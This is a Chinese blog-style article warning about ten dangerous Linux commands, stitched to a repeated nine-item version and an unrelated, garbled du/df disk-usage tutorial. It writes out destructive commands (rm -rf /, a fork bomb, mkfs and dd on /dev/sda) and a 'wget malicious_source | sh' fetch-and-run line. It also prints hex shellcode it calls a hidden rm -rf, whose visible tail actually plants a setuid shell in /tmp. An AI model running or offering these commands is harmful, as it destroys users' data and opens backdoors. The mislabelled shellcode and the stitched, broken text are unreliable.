Linux中最危险的10个命令

Linux中最危险的10个命令

对于编程人员或或者Linux系统管理员来说， *** 作Linux系统最常见的方法就是使用命令行。当然，Linux命令行佷有用、很高效，但有时候也很危险，尤其是在你误 *** 作或者不确定你自己在正在做什么的时候。下面我就为大家盘点最危险是10个命令，一起来看看吧!

当然，以下命令通常都是在root权限下才能将愚蠢发挥到无可救药在普 通用户身份下，破坏的只是自己的一亩三分地。

1. rm -rf 命令

rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm 命令的选项。

rm　命令在Linux下通常用来删除文件。

rm -r 命令递归的删除文件夹，甚至是空的文件夹。(译注：个人认为此处应该是说错了，从常识看，应该是“甚至是非空的文件夹”)

rm -f 命令能不经过询问直接删除‘只读文件’。(译注：Linux下删除文件并不在乎该文件是否是只读的，而只是在意其父目录是否有写权限。所以，-f这个参数 只是表示不必一个个删除确认，而是一律悄悄删除。另外，原始的rm命令其实也是没有删除提示的，只是一般的发行版都会将rm通过别名的方式增加-i参数来 要求删除确认，而-f则抑制了这个提示。)

rm -rf / : 强制删除根目录下所有东东。(就是说删除完毕后，什么也没有了。。。)

rm -rf *:　强制删除当前目录的所有文件。

rm -rf . : 强制删除当前文件夹及其子文件夹。

从 现在起，当你要执行rm -rf命令时请留心一点。我们可以在“.bashrc”文件对‘rm‘命令创建rm -i的别名，来预防用 ‘rm‘命令删除文件时的事故，它会要求你确认每一个删除请求。(译注：大多数发行版已经这样做了，如果还没有，请这样做，并在使用-f参数前一定考虑好 你在做什么!译者本人有着血泪的教训啊。)

2. :(){:|:&}: 命令

这就是个fork 炸d的实例。具体 *** 作是通过定义一个名为 ‘:‘的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:&}:

哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~

3. 命令　>/dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该 *** 作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4. mv 文件夹 /dev/null

这 个命令会移动某个‘文件夹‘到/dev/null。在Linux中 /dev/null 或 null 设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写 *** 作成功。(译注：这就是黑洞啊。当然，要说明的是，通过将文件夹移动到黑洞，并不能阻止 数据恢复软件的救赎，所以，真正的`彻底毁灭，需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)

# mv /home/user/* /dev/null

上列命令会将User目录所有内容移动到/dev/null，这意味着所有东西都被‘卷入’黑洞　(null)之中。

5. wget http://malicious_source -O- | sh

上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本，而sh会(无条件的)执行下载下来的脚本。

注意: 你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注：所以，你真的知道你在做什么吗?当遇到这种需要是，我的做法是，先wget下来，然后我去读一读其中到底写了些什么，然后考虑是否执行。)

6. mkfs.ext3 /dev/sda

上列命令会格式化块设备‘sda’，你无疑知道在执行上列命令后你的块设备(硬盘驱 动器)会被格式化，崭新的!没有任何数据，直接让你的系统达到不可恢复的阶段。(译注：通常不会直接使用/dev/sda这样的设备，除非是作为raw设 备使用，一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然，无论你使用sda还是sda1，这样对块设备或分区进行mkfs都是毁 灭性的，上面的数据都会被蒸发了。)

7. >file

上列命令常用来清空文件内容(译注：通常也用于记录命令输出。 不过请在执行前，确认输出的文件是空的或者还不存在，否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外，我想你可能真正想用的是 “>>”，即累加新的输出到文件，而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似 “>xt.conf”　的命令会覆盖配置文件或其他任何的系统配置文件。

8. ^foo^bar

这个命令在“鲜为人知而又实用的 Linux 命令大全：http://blog.csdn.net/zhu_xun/article/details/17018799”中描述过，用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。(译注：事实上，这种小技巧是译者认为的，少数史前时代遗留下来的无用而有害的“黑客”技巧。)

9. dd if=/dev/random of=/dev/sda

上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注：记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见，你可以覆写多次。)

10. 隐藏命令

下面的命令其实就是上面第一个命令 (rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。

这个命令表明通常真正的危险是隐藏的，不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyondchmod 4755/tmp/.beyond”

注意: 不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令，因为这将导致数据丢失或者系统崩溃。如果你想测试它们，请在虚拟机上运行。

这9个“非常危险”的Linux命令一定要记住!

1、rm-rf命令

rm-rf命令是删除文件夹及其内容最快的一种方式，仅仅一丁点的敲错或者无知都可能导致不可恢复的系统崩坏。

rm命令在Linux下通常用来删除文件

rm-f命令递归的删除文件夹，甚至是空的文件夹

rm-f命令能不经过询问直接删除只读文件

rm-rf/：强制删除根目录下所有东西

rm-rf/*：强制删除当前目录的所有文件

rm-rf.：强制删除当前文件夹及其子文件

温馨提示：当你要执行rm -rf命令时，一定要留心，可以在“.bashrc”文件对“rm”命令创建rm

-i的别名，来预防用‘rm’命令删除文件时的事故。

2、:(){:|:&}:命令

这就是一个fork炸d的实例。具体 *** 作是通过定义一个名为'：'的函数，它会调用自己两次，一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

3、命令 >/dev/sda

上列命令会将某个'命令'的输出写到块设备/dev/sda中。该 *** 作会将在块设备中的所有数据块替换为命令写入的原始数据，从而导致整个块设备的数据丢失。

4、mv文件夹/dev/null

这个命令会移动某个'文件夹'到/dev/null。在Linux中/dev/null或null设备是一个特殊的文件，所有写入它的数据都会被清除，然后返回写 *** 作成功。

5、wget http://malicious_source -O- | sh

上面这个命令会从一个恶意源下载一个脚本并执行。Wget命令会下载这个脚本，而sh会执行下载下来的脚本。

温馨提示：你应该时刻注意你下载包或者脚本的源。只能使用那些从可信任的源中下载脚本/程序。

6、mkfs.ext3 /dev/sda

上列命令会格式化设备'sda'，你无疑知道在执行上列命令后你的块设备会被格式化，崭新的。没有任何数据，直接让你的系统达到不可恢复的阶段。

7、>file

上面命令常用来清空文件内容，如果用上列执行时输入错误或无知的输入类似“>xt.conf”　的命令会覆盖配置文件或其他任何的系统配置文件。

8、^foo^bar

这个命令用来编辑先前运行的命令而无需要打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险，这可能导致真正的麻烦。

9、dd if=/dev/random of=/dev/sda

上面这个命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然，你的系统可能陷入混乱和不可恢复的状态。

linux中查看磁盘空间的方法举例查看当前目录大小：Java代码

[root@typengine.com]#

du

-sh

/var/www

查看指定目录大小：Java代码

[root@typengine.com]#

du

-sh

/www/typengine.com

查看当前目录文件总数：Java代码

[root@typengine.com]#

find

.

-type

f

|wc

-l

查看指定目录文件总数：Java代码

[root@typengine.com]#

find

/var/www

-type

f

|wc

-l

查看当前目录的目录总数：Java代码

[root@typengine.com]#

find

.

-type

d

|wc

-l

查看指定目录的目录总数：Java代码

[root@typengine.com]#

find

/www/typengine

-type

d

|wc

-l

以下内容供参考：Java代码

#

du

-ks

---in

all

#

du

-k

---every

last

du和df命令都被用于获得linux系统大小的信息：df用于报告文件系统的总块数及剩余块数，du

-s

/用于报告文件系统使用的块数。但是，我们可以发现从df命令算出的文件系统使用块数的值与通过du命令得出的值是不一致的。如下例：#

du

-s

/tmp

返回如下值：---12920

/tmp而

df

/tmp返回如下值：Java代码

Filesystem

--512-blocks--

Free

--%Used

--Iused--

%Iused

--Mounted

on

/dev/hd3

--------57344

--42208---

26%

----391

------4%

--/tmp

从上面的值我们可以算出

-

=

:

57344

-

42208

=

15136.而15136大于12920。该值差异的存在是由于du与df命令实施上的不同:

du

-s命令通过将指定文件系统中所有的目录、符号链接和文件使用的块数累加得到该文件系统使用的总块数；而df命令通过查看文件系统磁盘块分配图得出总块数与剩余块数。文件系统分配其中的一些磁盘块用来记录它自身的一些数据，如i节点，磁盘分布图，间接块，超级块等。这些数据对大多数用户级的程序来说是不可见的，通常称为Meta

Data。du命令是用户级的程序，它不考虑Meta

Data，而df命令则查看文件系统的磁盘分配图并考虑Meta

Data。df命令获得真正的文件系统数据，而du命令只查看文件系统的部分情况。例如，一个frag=4096

并且

nbpi=4096的空的大小为4MB的日志文件系统中Meta

Data的分配情况如下：Java代码

1

4k

block

for

the

LVM

2

4k

super

blocks

2

4k

blocks

for

disk

maps

2

4k

blocks

for

inode

maps

2

4k

blocks

for

.indirect

32

4k

blocks

for

inodes

-------------------------

41

4k

blocks

for

meta

data

on

an

empty

4MB

file

system

对于AIX

4.X版本：执行

du

/foo返回的结果如下：Java代码

----8

-------/foo/lost+found

----16

------/foo

要使du命令输出的结果与df命令输出的结果匹配，我们必须要加上Meta

Data。首先，将41个4k的块转换为以512字节为单位的值：Java代码

41

*

8

=

328

328(meta

data)

+

16(from

du)

=

344

所以有344个以512字节为单位的块分配给了这个空的文件系统。而使用

df

/foo命令我们可以得到下面的结果：Java代码

Filesystem

--512-blocks

--Free

--%Used

--Iused---%Iused

--Mounted

on

/dev/lv01

------8192

-----7848

-----5%

-----16

-----2%

----/foo

从中我们可以得到该文件系统使用的块数：Java代码

8192(total

blocks)

-

7848(free

blocks)

=

344。

该值与上面得出的值一致。上面的换算方法对于空的文件系统很容易实现，但是对于非空的文件系统，由于Meta

Data中文件间接块的大小不定，因此较难实现。不需要查看du

与

df返回的值的匹配关系，而只需要了解du

-s命令返回的值反映了分配给文件及目录的磁盘块数，而df命令则反映了文件系统的实际分配情况。df命令反映的实际情况包含了用户数据（文件及目录）和Meta

Data。另一个表现出du与df命令不同之处的例子如下：如果用户删除了一个正在运行的应用所打开的某个目录下的文件，则du命令返回的值显示出减去了该文件后的目录的大小。但df命令并不显示减去该文件后的大小。直到该运行的应用关闭了这个打开的文件，df返回的值才显示出减去了该文件后的文件系统的使用情况。列出一个目录占用的空间1.　du或du

-s或du

-kdu

-S

|

sort

-n

可以迅速发现那个目录是最大的。2.　用df可以看到已安装的文件系统的空间大小及剩余空间大小。3.　quota

-v查看用户的磁盘空间信息,如果你用quota限制了用户空间大小的话。Java代码

boot

5746310

/boot

[blinux@localhost

test]$

du

-ks

/boot

5772

/boot

[blinux@localhost

test]$

du

-ms

/boot

6

/boot

3.显示目录的总大小及目录树中各文件夹的大小，并以较好的单位表示Java代码

[blinux@localhost

test]$

du

-h

/boot

308K

/boot/grub

5.7M

/boot

---